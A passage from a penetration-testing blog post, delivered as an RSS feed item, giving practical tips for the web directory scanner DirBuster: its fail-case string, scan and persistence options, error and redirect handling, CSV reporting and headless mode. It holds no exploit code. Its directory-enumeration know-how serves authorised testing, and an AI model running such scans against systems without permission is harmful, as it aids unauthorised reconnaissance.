<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png"><img class="aligncenter size-full wp-image-190" alt="DirBuster Advanced Options - Scan Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png" width="549" height="163" /></a></p>
<p>Here lies the all-important &#8220;Fail Case String&#8221;, which by default is &#8220;thereIsNoWayThat-You-CanBeThere&#8221;. The response from this page is used to determine whether or not a guessed page/directory is there so it&#8217;s critical for the success of the scan. DirBuster will request this often in fact &#8211; for every file type in every directory that it finds. So starting from / with all the scan options enabled (directories, files, recursive and blank), having found <code>/admin/users/</code>, for example, DirBuster will request:</p>
<p><code>/admin/users/thereIsNoWayThat-You-CanBeThere/<br />
/admin/users/thereIsNoWayThat-You-CanBeThere<br />
/admin/users/thereIsNoWayThat-You-CanBeThere.php</code></p>
<p>If you&#8217;re getting strange results from DirBuster, consider changing this string. It may even be worth getting into the habit of manually testing the fail case string as a directory and page before you start a lengthy scan.</p>
<h4>DirBuster Options</h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png"><img class="aligncenter size-full wp-image-192" alt="DirBuster Advanced Options - Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png" width="593" height="219" /></a>The last tab serves as a reminder that most of the Options and Advanced Options discussed above get reset when you re-start DirBuster. Only the proxy settings persist beyond the options listed in this tab, which cover the default number of threads, dictionary and file extensions. These options will be pre-populated when you start DirBuster from fresh. Although you&#8217;ll lose many of your options on restart, being forced to reconsider them maybe isn&#8217;t such a bad thing.</p>
<h2>And finally</h2>
<p>It&#8217;s worth starting DirBuster relatively early on in the test because it can take a while to complete, and obviously you want some time left over to explore anything interesting it finds. Keep an eye on the results while it&#8217;s running to make sure you&#8217;re getting something sensible &#8211; and that you&#8217;re not causing a slew of 500 errors. Version 1.0 RC1 will pause automatically after 20 <em>consecutive</em> errors but that&#8217;s <em>client-side</em> errors, not 500 responses. Equally if you&#8217;re getting mostly redirects, try to alter your parameters or, as a last resort, enable the &#8220;Follow Redirects&#8221; option.</p>
<p>Despite &#8211; or because of &#8211; your efforts to optimise your scan, you can often get a large number of hits. On the reporting side, the CSV option is useful because you get the Location, Response Code and Content Length on one line so you can quickly begin to process this and weed out the cruft.</p>
<p>Finally, note that you can invoke a command line interface by running DirBuster in headless mode. Check out the options with <code>java -jar &lt;DirBuster_jar_file&gt; -h</code>. The parameters don&#8217;t comprehensively match the GUI options, though, so if you need a command-line scanner of this type and DirBuster isn&#8217;t up to the job, try <code>dirb</code> (on Kali).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/three-cheers-for-dirbuster/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
